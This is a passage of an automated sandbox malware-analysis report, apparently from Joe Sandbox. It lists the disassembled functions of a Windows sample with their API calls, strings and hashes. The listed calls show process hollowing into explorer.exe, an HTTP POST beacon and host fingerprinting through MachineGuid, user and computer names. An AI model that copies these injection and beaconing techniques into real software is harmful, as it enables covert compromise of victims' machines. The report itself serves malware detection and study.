WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00E461CE
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 00E461DC
NtClose.NTDLL ref: 00E46215
NtClose.NTDLL ref: 00E46226
NtClose.NTDLL ref: 00E46230
CloseHandle.KERNEL32(00000000), ref: 00E46233

Strings

RtlDestroyProcessParameters, xrefs: 00E45EF9
"%s", xrefs: 00E45FE3
RtlCreateProcessParametersEx, xrefs: 00E45EEE
NtCreateProcessEx, xrefs: 00E45EE3
ntdll, xrefs: 00E45EC5
.exe, xrefs: 00E45F3F
%08x%s, xrefs: 00E45F50
NtCreateThreadEx, xrefs: 00E45F04
NtCreateSection, xrefs: 00E45EDB

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
API String ID: 3548791621-756185880
Opcode ID: d5bdae9d2917fb7c3325acbc7d1c1c72b287d8f574372900c4ac1fd37b2edfdc
Instruction ID: 4607b823112a6b94fc4da7551c6f37a4841d1210e62a67d515c9a24b11ef1c87
Opcode Fuzzy Hash: d5bdae9d2917fb7c3325acbc7d1c1c72b287d8f574372900c4ac1fd37b2edfdc
Instruction Fuzzy Hash: 04B14871A40218BFEB20DBA5DC49FAEBBBCEB05704F1040A5F615F7290D7B4AA458B64

Function 00E466E0 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 230
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON(00000000,?,?), ref: 00E46702
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00E46722
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E4673B
HeapAlloc.KERNEL32(00000000), ref: 00E46742
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00E46763
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46788
InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 00E467C1
InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E467DE
HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 00E46817
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E46840
InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 00E4685A
HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 00E4686E
InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 00E46890
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E468A9
HeapAlloc.KERNEL32(00000000), ref: 00E468B0
GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 00E468BB
HeapReAlloc.KERNEL32(00000000), ref: 00E468C2
InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 00E468D6
InternetCloseHandle.WININET(00000000), ref: 00E468F8
InternetCloseHandle.WININET(00000000), ref: 00E46903
InternetCloseHandle.WININET(00000000), ref: 00E46909
GetProcessHeap.KERNEL32(00000000,?), ref: 00E4693C
HeapFree.KERNEL32(00000000), ref: 00E4693F
GetProcessHeap.KERNEL32(00000000,?), ref: 00E4694B
HeapFree.KERNEL32(00000000), ref: 00E4694E
GetProcessHeap.KERNEL32(00000000,?), ref: 00E4695A
HeapFree.KERNEL32(00000000), ref: 00E4695D

Strings

`, xrefs: 00E46798
POST, xrefs: 00E46811
Content-Type: application/octet-streamContent-Encoding: binary, xrefs: 00E46868

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
API String ID: 2744214989-3343008755
Opcode ID: 90d35e2638e4392b3746b765972c413136df23013f96c249ccc1b5ce2d33280a
Instruction ID: bb3b81fce81b0c199f572178c7ea6d99000a7050781c62e74b619fc5723945ed
Opcode Fuzzy Hash: 90d35e2638e4392b3746b765972c413136df23013f96c249ccc1b5ce2d33280a
Instruction Fuzzy Hash: 01719175A40219BFEB209BA5DC49FAEBBB8EB4A714F140015FA11F7290DBB0D9058B61

Function 00E45B30 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 285
injectionthreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 00E45B53
GetProcAddress.KERNEL32(00000000), ref: 00E45B5A
CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 00E45C1D
NtQueryInformationProcess.NTDLL ref: 00E45C3A
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 00E45C54
GetThreadContext.KERNEL32(?,00010007), ref: 00E45C64
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 00E45C98
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00E45CC2
WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 00E45CFB
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 00E45DE2
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 00E45DFA
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 00E45E55
SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 00E45E70
ResumeThread.KERNEL32(?,?,?,00000000), ref: 00E45E79
CloseHandle.KERNEL32(?), ref: 00E45E88
CloseHandle.KERNEL32(00000000), ref: 00E45E8D

Strings

.reloc, xrefs: 00E45D4F
ntdll, xrefs: 00E45B4E
C:\Windows\system32\certutil.exe, xrefs: 00E45B90
C:\Windows\system32\explorer.exe, xrefs: 00E45BA0, 00E45C1C
NtUnmapViewOfSection, xrefs: 00E45B49

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
API String ID: 918112823-4001407722
Opcode ID: 29d2af587b54ebb2c1766cfd46464b6a0955baf83d5e9fb7f7b4cc2ea8b7ad0e
Instruction ID: dc6095f5aa2371388a52b389e147034d2463e843b46bc197063aa013a4e32dc9
Opcode Fuzzy Hash: 29d2af587b54ebb2c1766cfd46464b6a0955baf83d5e9fb7f7b4cc2ea8b7ad0e
Instruction Fuzzy Hash: 84B16B76E00219AFDF10CF99EC84BAEBBB5FF49304F2450A9E905B7292D7319945CB50

Function 00E48356 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 182
sleepencryptionfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 00E47E16
lstrcmpA.KERNEL32(00000000,INIT), ref: 00E47E23
StrToIntA.SHLWAPI(00000000), ref: 00E47EE6
Sleep.KERNEL32(00000000), ref: 00E48346
InitializeCriticalSection.KERNEL32(00E4A080), ref: 00E483A2

Part of subcall function 00E47050: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00E47087
Part of subcall function 00E47050: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00E470A3
Part of subcall function 00E47050: GetProcessHeap.KERNEL32(00000008,?), ref: 00E470B2
Part of subcall function 00E47050: HeapAlloc.KERNEL32(00000000), ref: 00E470B9
Part of subcall function 00E47050: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00E470D6
Part of subcall function 00E47050: RegCloseKey.ADVAPI32(80000002), ref: 00E470E8

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E483CF
StringFromGUID2.OLE32(?,?,00000080), ref: 00E48428
wsprintfA.USER32 ref: 00E4843F
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00E48453
GetLastError.KERNEL32 ref: 00E4845E
ExitProcess.KERNEL32 ref: 00E48563

Part of subcall function 00E424E0: GetTickCount.KERNEL32 ref: 00E424E2

WSAStartup.WS2_32(00000202,?), ref: 00E4849C
CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00E484B5
CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00E484D1
CoInitializeEx.OLE32(00000000,00000000), ref: 00E4851C
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 00E48533
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 00E48552

Strings

C:\, xrefs: 00E483CA
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00E484A9, 00E484C6
%temp%\%paths%, xrefs: 00E4852E

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQuerySleepValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumelstrcmpwsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3969963109-2941900213
Opcode ID: 7ac20deece6c471b320a3cd494b4035452f3619937a9682a25b8c0a327c4fea7
Instruction ID: d2c6036e343ceef82f90aa659ec52802278f75a700f86adb369f829de8401a1f
Opcode Fuzzy Hash: 7ac20deece6c471b320a3cd494b4035452f3619937a9682a25b8c0a327c4fea7
Instruction Fuzzy Hash: 29611670E803089FEB24DFA5ED4ABAD77B8FB05305F1450AAF504F7282DB7499498B91

Function 00E47690 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 174
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LsaOpenPolicy.ADVAPI32(00000000,00E4A060,00000001,?), ref: 00E476CC
LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 00E476DF
GetProcessHeap.KERNEL32(00000008,?), ref: 00E476FB
HeapAlloc.KERNEL32(00000000), ref: 00E47702
LsaFreeMemory.ADVAPI32(?), ref: 00E4773C
LsaClose.ADVAPI32(?), ref: 00E47745
GetComputerNameW.KERNEL32(?,?), ref: 00E47764
GetUserNameW.ADVAPI32(?,00000101), ref: 00E47775
wsprintfA.USER32 ref: 00E477F6
wsprintfA.USER32 ref: 00E47829
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E47880
HeapFree.KERNEL32(00000000), ref: 00E47883
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E4788C
HeapFree.KERNEL32(00000000), ref: 00E4788F

Strings

%d|%s|%.16s|, xrefs: 00E477F0
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00E47786
%s|%d.%d (%d)|%S|%S|%S, xrefs: 00E47823

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$NamePolicywsprintf$AllocCloseComputerInformationMemoryOpenQueryUser
String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%S|%S|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 3257352186-369990036
Opcode ID: e29fbcf070a735b75fce10493b1cc069e02414e9bfe333853f5483074894b568
Instruction ID: 064cc68019c363ec1f7a7c763c015a20fedf3efba66a6260fcade2bb237ea705
Opcode Fuzzy Hash: e29fbcf070a735b75fce10493b1cc069e02414e9bfe333853f5483074894b568
Instruction Fuzzy Hash: CB51C275A04259AFDB20CFA5DC48BAFBBB9FF48304F4400A6E984B7151D7709A46CBA0

Function 00E478A0 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 434
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIA.SHLWAPI(?,?,00000000), ref: 00E478EA
wnsprintfA.SHLWAPI ref: 00E47982
wsprintfA.USER32 ref: 00E479A9
lstrcmpA.KERNEL32(?,Start), ref: 00E47C2B
EnterCriticalSection.KERNEL32(00E4A080), ref: 00E47C84
GetProcessHeap.KERNEL32(00000008,?), ref: 00E47CE8
HeapAlloc.KERNEL32(00000000), ref: 00E47CEF
GetProcessHeap.KERNEL32(00000008,?,?), ref: 00E47CFA
HeapReAlloc.KERNEL32(00000000), ref: 00E47D01
LeaveCriticalSection.KERNEL32(00E4A080), ref: 00E47D58

Part of subcall function 00E45EB0: GetModuleHandleW.KERNEL32(ntdll), ref: 00E45ECD
Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 00E45EE1
Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 00E45EEC
Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 00E45EF7
Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 00E45F02
Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00E45F0D
Part of subcall function 00E45EB0: GetTempPathW.KERNEL32(000000F6,?), ref: 00E45F26
Part of subcall function 00E45EB0: wnsprintfW.SHLWAPI ref: 00E45F61
Part of subcall function 00E45EB0: PathCombineW.SHLWAPI(?,?,?), ref: 00E45F7B
Part of subcall function 00E45EB0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 00E45FA2
Part of subcall function 00E45EB0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E45FC6
Part of subcall function 00E45EB0: SetEndOfFile.KERNEL32(00000000), ref: 00E45FC9
Part of subcall function 00E45EB0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E45FD6
Part of subcall function 00E45EB0: wnsprintfW.SHLWAPI ref: 00E45FF4

GetProcessHeap.KERNEL32(00000000,?), ref: 00E47D77
HeapFree.KERNEL32(00000000), ref: 00E47D7E

Strings

%s|%s, xrefs: 00E479A3
%d|%s|%.16s|, xrefs: 00E47971
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00E47920
Start, xrefs: 00E47C25

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
API String ID: 851647271-3778496198
Opcode ID: aa9360f5ccff9acb9a401d6a95a999542e821997d3225679276631be1b5ab3bc
Instruction ID: cf14c502d3b95d3c253f9d26ede0b9affe5c7bc8d18d5c973c4de56f8fc27927
Opcode Fuzzy Hash: aa9360f5ccff9acb9a401d6a95a999542e821997d3225679276631be1b5ab3bc
Instruction Fuzzy Hash: 25E12534E086568FDB298F68E84077E77A6FF86308F19A0ADD891B7202DB308D4587D0

Function 00E48380 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 121encryptionfilesynchronizationCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00E4A080), ref: 00E483A2

Part of subcall function 00E47050: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00E47087
Part of subcall function 00E47050: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00E470A3
Part of subcall function 00E47050: GetProcessHeap.KERNEL32(00000008,?), ref: 00E470B2
Part of subcall function 00E47050: HeapAlloc.KERNEL32(00000000), ref: 00E470B9
Part of subcall function 00E47050: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00E470D6
Part of subcall function 00E47050: RegCloseKey.ADVAPI32(80000002), ref: 00E470E8

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E483CF
StringFromGUID2.OLE32(?,?,00000080), ref: 00E48428
wsprintfA.USER32 ref: 00E4843F
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00E48453
GetLastError.KERNEL32 ref: 00E4845E
ExitProcess.KERNEL32 ref: 00E48563

Part of subcall function 00E424E0: GetTickCount.KERNEL32 ref: 00E424E2

WSAStartup.WS2_32(00000202,?), ref: 00E4849C
CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00E484B5
CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00E484D1
CoInitializeEx.OLE32(00000000,00000000), ref: 00E4851C
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 00E48533
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 00E48552

Strings

C:\, xrefs: 00E483CA
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00E484A9, 00E484C6
%temp%\%paths%, xrefs: 00E4852E

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 267019445-2941900213
Opcode ID: ed694a431efa30eb29ce03a72057273e4d71750efe0380cb30f3dc1f7a8ae417
Instruction ID: 3ad96e7ce30073c35ece0833e02b0695554306873a385c4fd5e6f62a5a9db358
Opcode Fuzzy Hash: ed694a431efa30eb29ce03a72057273e4d71750efe0380cb30f3dc1f7a8ae417
Instruction Fuzzy Hash: 96412474A80308EEEB24DFA0ED0AFAE7778FB01705F1440A5F604FA1D1EBB095498B95

Function 00E48FC0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86memoryencryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(00000020,?), ref: 00E48FD8

Part of subcall function 00E42680: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,00E49025,00000000), ref: 00E426A2
Part of subcall function 00E42680: HeapAlloc.KERNEL32(00000000,?,?,?,?,00E49025,00000000), ref: 00E426A9

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E49035
HeapFree.KERNEL32(00000000), ref: 00E4903C
wsprintfA.USER32 ref: 00E4906F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E490A8
HeapFree.KERNEL32(00000000), ref: 00E490AB
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E490B0
HeapFree.KERNEL32(00000000), ref: 00E490B3

Strings

VoYGkc5R, xrefs: 00E49057
%d|%s|%s|%s, xrefs: 00E49069

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocCryptRandomwsprintf
String ID: %d|%s|%s|%s$VoYGkc5R
API String ID: 4113358155-4073333701
Opcode ID: 5df7d4684719a9a6ba6688cfbac78b61b6c4db8fcce0a5711401e91dd1015ba6
Instruction ID: e30b58c0cff09f2468fdbe2abc773713dfb61a1477590745f483e9701afe6bdc
Opcode Fuzzy Hash: 5df7d4684719a9a6ba6688cfbac78b61b6c4db8fcce0a5711401e91dd1015ba6
Instruction Fuzzy Hash: 1C210675E403086FEB10ABA0BC4AFEF7B6CDF45755F081164FA04B71C2EA619909C7A2

Function 00E46250 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00E4625D
OpenProcessToken.ADVAPI32(00000000), ref: 00E46264
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00E46279
CloseHandle.KERNEL32(?), ref: 00E46286
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00E462B0
CloseHandle.KERNEL32(?), ref: 00E462BB

Strings

SeShutdownPrivilege, xrefs: 00E46272

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 158869116-3733053543
Opcode ID: 93ebfe76c21ede5d197b43243b29aa980a011fd1861d4a6469ed55088216293c
Instruction ID: 960cf90657e4fec1db81cab5e01cad724c1aaf48d156101c48b35a0c6ebf3fb8
Opcode Fuzzy Hash: 93ebfe76c21ede5d197b43243b29aa980a011fd1861d4a6469ed55088216293c
Instruction Fuzzy Hash: D0014F75E40218FFDB209BE5AD0ABEFBBB8EB05702F100195B904B6190D7B19A1997A1

Function 0062421C Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00624228
IsDebuggerPresent.KERNEL32 ref: 006242F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00624314
UnhandledExceptionFilter.KERNEL32(?), ref: 0062431E

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 40a467a05cf410c79dcb6b28d36d5d02b86c8da187ba049e1bb2aa5607abbe65
Instruction ID: c30868ce36044f7428dedb06307bcab82248274d8799656a79c819668146fdfe
Opcode Fuzzy Hash: 40a467a05cf410c79dcb6b28d36d5d02b86c8da187ba049e1bb2aa5607abbe65
Instruction Fuzzy Hash: 4C312975D0526CDBDB11DFA4E989BCDBBB8AF08304F1040AAE40CAB250EB715A858F44

Function 0062695B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00626A53
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00626A5D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00626A6A

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f70535285dba876066c7485ac4ddc87696e5aa97390d053c3c735458d73d4006
Instruction ID: ae15eb512fbfc2ec2aa24d6ace747ebe3df85b0b7ddf7f1b24e7023fcee902fc
Opcode Fuzzy Hash: f70535285dba876066c7485ac4ddc87696e5aa97390d053c3c735458d73d4006
Instruction Fuzzy Hash: C331C3759016289BCB61DF64ED897CDBBB9BF08310F5081EAE41CA7260EB709F858F44

Function 006275A2 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,006275A1,?,?,?,?,?,0062C8FA), ref: 006275C4
TerminateProcess.KERNEL32(00000000,?,006275A1,?,?,?,?,?,0062C8FA), ref: 006275CB
ExitProcess.KERNEL32 ref: 006275DD

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a78e651893f0602abf76837badfdcc0b773ba160a2e73228329d6a72d34d144a
Instruction ID: b45cad8f974b256e8470c7019229c8654aac458523bdf1b34035b48f753daa0e
